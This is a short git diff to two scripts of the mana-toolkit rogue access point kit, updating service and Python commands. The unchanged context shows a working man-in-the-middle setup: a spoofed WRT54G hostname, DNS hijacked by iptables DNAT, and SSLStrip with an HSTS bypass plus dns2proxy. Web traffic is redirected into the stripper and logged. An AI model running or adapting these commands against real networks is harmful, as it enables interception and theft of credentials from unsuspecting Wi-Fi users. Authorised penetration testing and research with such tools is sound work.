diff --git a/run-mana/start-nat-full.sh b/run-mana/start-nat-full.sh
index c69ca61..9892cc5 100755
--- a/run-mana/start-nat-full.sh
+++ b/run-mana/start-nat-full.sh
@@ -9,7 +9,7 @@ hostname WRT54G
 echo hostname WRT54G
 sleep 2
 
-service network-manager stop
+systemctl stop network-manager
 rfkill unblock wlan
 
 ifconfig $phy down
@@ -37,7 +37,7 @@ iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1
 
 #SSLStrip with HSTS bypass
 cd /usr/share/mana-toolkit/sslstrip-hsts/sslstrip2/
-python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log.`date "+%s"`&
+python2 sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log.`date "+%s"`&
 iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
 cd /usr/share/mana-toolkit/sslstrip-hsts/dns2proxy/
 python dns2proxy.py -i $phy&
@@ -93,7 +93,7 @@ pkill dnsmasq
 pkill sslstrip
 pkill sslsplit
 pkill hostapd
-pkill python
+pkill python2
 iptables --policy INPUT ACCEPT
 iptables --policy FORWARD ACCEPT
 iptables --policy OUTPUT ACCEPT
diff --git a/run-mana/start-nat-simple.sh b/run-mana/start-nat-simple.sh
index e0affb5..d8fb512 100755
--- a/run-mana/start-nat-simple.sh
+++ b/run-mana/start-nat-simple.sh
@@ -5,7 +5,7 @@ phy=wlan1
 conf=/etc/mana-toolkit/hostapd-mana.conf
 hostapd=/usr/lib/mana-toolkit/hostapd
 
-service network-manager stop
+systemctl stop network-manager
 rfkill unblock wlan
 
 ifconfig $phy up
